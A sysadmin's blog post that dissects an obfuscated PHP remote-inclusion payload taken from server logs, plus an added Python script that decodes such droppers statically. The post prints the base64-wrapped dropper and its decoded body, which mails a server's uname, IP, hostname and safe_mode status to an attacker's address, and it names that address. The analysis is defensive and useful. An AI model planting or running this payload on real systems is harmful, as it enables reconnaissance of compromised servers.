Foreword - Note that none of our servers are vulnerable to remote inclusion attacks.

For the most part, the exploits I covered in yesterday's post are common-or-garden PHP vulnerability scans.
Some of them are more interesting, though more for being obfuscated with base64 than for anything else.

If I take an example from our log files:

http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt

This returns a base64-encoded string.
It's fairly easy to see what it contains, merely by changing the eval to an echo.

<?php
//Edited slightly for width purposes
$lmge = "JGNyZWF0b3I9YmFzZTY0X2RlY29kZSgiWm5Jek0zTm9NMnhzUUdkdFlXb".
"HNMbU52YlE9PSIpOw0KKCRzYWZlX21vZGUpPygkc2FmZXo9".
"Ik9OIik6KCRzYWZlej0iT0ZGX0hFSEUiKTsNCiRiYXNlPSJodHRw".
"Oi8vIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uJF9TRVJWRVJbJ1JFU".
"VVFU1RfVVJJJ107IA0KJG5hbWUgPSBwaHBfdW5hbWUoKTsgJGl".
"wID0gZ2V0ZW52KCJSRU1PVEVfQUREUiIpOyAkaXAyID0gZ2V0".
"aG9zdGJ5YWRkcigkX1NFUlZFUltSRU1PVEVfQUREUl0pOyAkc3V".
"iaiA9ICRfU0VSVkVSWydIVFRQX0hPU1QnXTsgDQokbXNnID0gIl".
"xuQkFTRTogJGJhc2VcbnVuYW1lIGE6ICRuYW1lXG5CeXBhc3M6".
"ICRieXBhc3NlclxuSVA6ICRpcFxuSG9zdDogJGlwMiAkcHdkcyI7D".
"QokZnJvbSA9IkZyb206ICIuJHdyaXQuIl9fXz0iLiRzYWZlei4iPHRv".
"b2xAIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uIj4iOw0KbWFpbCgg".
"JGNyZWF0b3IsICRzdWJqLCAkbXNnLCAkZnJvbSk7";

//eval(base64_decode($lmge));

//To stop execution and merely see the script contents, we echo it instead of eval'ing it.
echo (base64_decode($lmge));
exit;

Echoing the decoded string gives this:

$creator=base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ=="); 

($safe_mode)?($safez="ON"):($safez="OFF_HEHE");
$base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$name = php_uname(); $ip = getenv("REMOTE_ADDR"); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST'];
$msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds";
$from ="From: ".$writ."___=".$safez."<tool@".$_SERVER['HTTP_HOST'].">";
mail( $creator, $subj, $msg, $from);

So in this case we can see the attacker wants the server to email him its details (php_uname output, IP and hostname), the URL the inclusion worked against, and whether PHP safe_mode is on.

If we decode the address he wants the mail sent to, we can see it's a Gmail account.

echo base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ==");   //returns fr33sh3ll@gmail.com

Google has been notified about that account.
All in all, slightly more interesting than the usual!
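The same analysis can be done without ever letting PHP touch the sample. The following is an added example (not code from the original post): a small static decoder that finds the eval(base64_decode(...)) call, reassembles the base64 literal from its "...". "..." pieces (ignoring stray whitespace like the one in the listing above), decodes it, and then decodes nested base64 literals such as the hidden mail address, reporting which functions the payload would call. The PHP sample it runs on is constructed in the block to have the same shape as the log payload; the address inside it is a labelled placeholder, not the one from the post.

```python
"""Static triage of an eval(base64_decode(...)) PHP dropper.

Added example, not code from the original post. Mirrors the post's
"swap eval for echo" trick without executing anything: locate the
base64 literal, reassemble it, decode it, then scan the decoded script
for nested base64 literals (the attacker's address) and notable calls.
"""
import base64
import re

# $name = "piece" . "piece" ... ;   (string pieces concatenated with '.')
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*((?:"[^"]*"\s*\.?\s*)+);', re.S)
# eval(base64_decode($name))  or  eval(base64_decode("literal"))
EVAL_RE = re.compile(r'eval\s*\(\s*base64_decode\s*\(\s*(\$\w+|"[^"]*")\s*\)\s*\)', re.S)
# base64_decode("....") literals inside the decoded script
INNER_B64_RE = re.compile(r'base64_decode\s*\(\s*"([A-Za-z0-9+/=\s]+)"\s*\)')
EMAIL_RE = re.compile(r'[\w.+-]+@[\w-]+\.[\w.-]+')
FUNCS_OF_INTEREST = ("mail", "php_uname", "getenv", "gethostbyaddr", "safe_mode")


def _b64(text):
    """Decode base64, ignoring stray whitespace (PHP's non-strict base64_decode does too)."""
    clean = re.sub(r'\s+', '', text)
    clean += '=' * (-len(clean) % 4)          # tolerate missing padding
    return base64.b64decode(clean).decode('utf-8', errors='replace')


def string_variables(php):
    """Return {name: joined string} for every  $x = "..."."...";  assignment."""
    out = {}
    for name, pieces in ASSIGN_RE.findall(php):
        out[name] = ''.join(re.findall(r'"([^"]*)"', pieces))
    return out


def decode_eval_payloads(php):
    """Return the decoded body of every eval(base64_decode(...)) found; nothing is executed."""
    variables = string_variables(php)
    bodies = []
    for arg in EVAL_RE.findall(php):
        raw = arg.strip('"') if arg.startswith('"') else variables.get(arg[1:], '')
        if raw:
            bodies.append(_b64(raw))
    return bodies


def triage(php):
    """Summarise what the decoded payload(s) would do: functions used, addresses contacted."""
    report = {"payloads": [], "functions": set(), "emails": set()}
    for body in decode_eval_payloads(php):
        report["payloads"].append(body)
        report["functions"].update(f for f in FUNCS_OF_INTEREST if f in body)
        for inner in INNER_B64_RE.findall(body):      # nested literals, as with the address
            report["emails"].update(EMAIL_RE.findall(_b64(inner)))
        report["emails"].update(EMAIL_RE.findall(body))
    return report


# --- constructed sample, shaped like the log payload (placeholder address) -------------
PLACEHOLDER_ADDR = "attacker-placeholder@example.invalid"   # placeholder, not a real address
INNER_SCRIPT = (
    '$creator=base64_decode("%s");\r\n'
    '($safe_mode)?($safez="ON"):($safez="OFF");\r\n'
    '$base="http://".$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\'];\r\n'
    '$name = php_uname(); $ip = getenv("REMOTE_ADDR");\r\n'
    'mail( $creator, $_SERVER[\'HTTP_HOST\'], "BASE: $base uname: $name IP: $ip", "From: tool");'
) % base64.b64encode(PLACEHOLDER_ADDR.encode()).decode()


def build_sample():
    """Wrap INNER_SCRIPT the way the dropper does: base64, split into concatenated pieces."""
    b64 = base64.b64encode(INNER_SCRIPT.encode()).decode()
    chunks = [b64[i:i + 40] for i in range(0, len(b64), 40)]
    chunks[1] = chunks[1][:5] + ' ' + chunks[1][5:]   # stray whitespace, as in the listing
    return '<?php\n$lmge = "%s";\n\neval(base64_decode($lmge));\n' % '".\n"'.join(chunks)


SAMPLE_PHP = build_sample()

if __name__ == "__main__":
    result = triage(SAMPLE_PHP)
    print("functions:", sorted(result["functions"]))
    print("addresses:", sorted(result["emails"]))
    print(result["payloads"][0])
```

Feeding a real sample to triage() instead of SAMPLE_PHP gives the same report as the echo trick, plus the list of addresses and functions to record for the incident, with the difference that a mistyped eval can never fire.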
